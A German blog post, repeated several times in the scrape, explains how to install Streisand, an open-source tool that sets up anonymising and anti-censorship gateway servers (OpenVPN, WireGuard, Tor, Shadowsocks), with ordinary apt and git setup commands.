Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist – leider noch – ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss – sofern noch nicht vorhanden – mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt updateapt-get install git python-pipgit clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let’s Encrypt nutzen wollt – was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

alt

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. ?

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

STREISAND - Automatisierter Gateway-Server zum anonymen surfen

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Streisand Übersicht

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist - leider noch - ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss - sofern noch nicht vorhanden - mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt update
apt-get install git python-pip
git clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let's Encrypt nutzen wollt - was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Informationen zum Streisand Zugang

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. :)

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

alt

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist – leider noch – ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss – sofern noch nicht vorhanden – mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt updateapt-get install git python-pipgit clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let’s Encrypt nutzen wollt – was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

alt

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. ?

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

STREISAND - Automatisierter Gateway-Server zum anonymen surfen

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Streisand Übersicht

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist - leider noch - ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss - sofern noch nicht vorhanden - mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt update
apt-get install git python-pip
git clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let's Encrypt nutzen wollt - was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Informationen zum Streisand Zugang

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. :)

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

STREISAND - Automatisierter Gateway-Server zum anonymen surfen

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Streisand Übersicht

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist - leider noch - ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss - sofern noch nicht vorhanden - mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt update
apt-get install git python-pip
git clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let's Encrypt nutzen wollt - was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Informationen zum Streisand Zugang

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. :)

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

STREISAND - Automatisierter Gateway-Server zum anonymen surfen

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Streisand Übersicht

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist - leider noch - ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss - sofern noch nicht vorhanden - mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt update
apt-get install git python-pip
git clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let's Encrypt nutzen wollt - was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Informationen zum Streisand Zugang

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. :)

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

alt

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist – leider noch – ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss – sofern noch nicht vorhanden – mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt updateapt-get install git python-pipgit clone https://github.com/StreisandEffect/streisand.git && cd streisand

Mittels folgenden Befehl wird der Installer für Ansible gestartet. Dieser prüft zunächst auf fehlende Pakete und wird euch diese auflisten. Installiert diese wie angegeben.

./util/venv-dependencies.sh ./venv

Anschließend ruft ihr den Befehl erneut auf um die Installation durchzuführen. Ist die Installation durchgelaufen aktiviert ihr mit folgendem Befehl die installierten Ansible-Pakete:

source ./venv/bin/activate

Ein Ausführen von ./streisand startet nun die Installation. Wählt im Installer nun den Punkt 7. localhost (Advanced) aus und bestätigt im weiteren Verlauf die Warnung, dass ggf. Konfigurationen überschrieben werden können.

Wenn ihr gefragt werdet, ob ihr Änderungen an den Standard-Einstellungen vornehmen möchtet, widersprecht ihr mit Eingabe von no.

Ebenfalls werdet ihr im Verlauf der Installation nach Hostnamen des Servers und eurer E-Mail-Adresse gefragt. Beides ist lediglich von Bedeutung, sofern ihr Let’s Encrypt nutzen wollt – was sich allerdings gerade bei solch einem Anwendungsfall empfiehlt.

alt

Die Installation wird mit einer Fehlermeldung erfolgreich beendet werden, was daran liegt, dass der Installer versucht euch die HTML-Datei mit dem Zugangsdaten anzuzeigen.
Kopiert euch von eurem System den Ordner generated-docs herunter. Dieser enthält Informationen zur Firewall und die erwähnten Zugangsdaten.

Streisand ist nun eingerichtet und bereit zur Benutzung. ?

Sofern jemand in der anfangs beschriebenen Situation ist und solch eine Installation benötigt, schreibt mir eine E-Mail und ich helfe gerne weiter!

STREISAND - Automatisierter Gateway-Server zum anonymen surfen

Es gibt in der heutigen Zeit gute Gründe, über VPN, einen Proxy oder über TOR ins Netz zu gehen. Sei es das öffentliche W-Lan im Lieblingscafé oder aber wesentlich relevanter, ihr befindet euch in einem Land, in dem kein freies Internet vorhanden ist bzw. gewisse Inhalte blockiert werden.
Nicht jeder Mensch kann oder möchte sich damit herumschlagen, beispielsweise einen OpenVPN-Server oder Proxy-Server einzurichten. Oft fehlt auch einfach das technische Verständnis bzw. Kenntnis.

STREISAND - Automatisierter Gateway-Server zum anonymen surfen
Streisand Übersicht

Streisand zeigt wie wundervoll OpenSource im Kampf gegen Unterdrückung und Zensur im Internet helfen kann. Mittels Streisand lassen sich in wenigen Minuten auf Wunsch unzählige Gateway-Server zum anonymen Zugriff einrichten, die euch folgende fertig konfigurierte Dinge bieten:

  • Passwortgeschützte Gateway-Seite mittels NGINX, erreichbar über SSL und Tor als Hidden service
  • Installation folgender Dienste: OpenSSH, OpenConnect / Cisco AnyConnect, OpenVPN, Shadowsocks, sslh, Stunnel, Tor, UFW, unattended-upgrades, WireGuard
  • Schritt-für-Schritt-Anleitungen zur Einrichtung der einzelnen Dienste
  • Sämtliche empfohlene Software wird gemirrored. Die Authentizität wird mittels Checksummen sichergestellt.
  • Alle genutzten Ports wurden so gewählt, dass Port-Blockierungen sich als schwierig erweisen. Als Beispiel verwendet OpenVPN Port 636, der auch von LDAP verwendet wird.

Eine deutlich umfangreichere Auflistung findet ihr in der Readme vom Projekt.

Die Installation ist zur Zeit leider noch mit Mehraufwand verbunden, was in Zukunft aber vereinfacht werden soll.
Der Normalfall sieht vor, dass von eurem Client aus mittels Ansible-Scripts ein neuer Server bei Amazon EC2, Azure, DigitalOcean, Google Compute Engine, Linode und Rackspace angelegt und automatisch eingerichtet wird. Es gibt aber auch die Möglichkeit lokal vorzugehen. Ich beschreibe im folgenden, wie ich vorgegangen bin.

Ausgangslage ist bei mir ein Cloud-Server von Hetzner. Voraussetzung ist - leider noch - ein Ubuntu 16.04-Image. Als erstes sorgt dafür, dass euer Server mittels DNS erreichbar ist, damit ihr später im Verlauf der Installation ein Let´s Encrypt-Zertifikat beantragen könnt.
Bevor wir mit der Installation beginnen, muss - sofern noch nicht vorhanden - mittels ssh-keygen ein SSH-Key erstellt werden. Übernimmt einfach die vorgeschlagenen Standard-Pfade.

Als erstes müssen wir nun ein ein paar benötigte Pakete installieren sowie das Projekt von Github clonen:

apt update
apt-get install git python-pip
git clone https://github.com/StreisandEffect/streisand.git && cd streisand

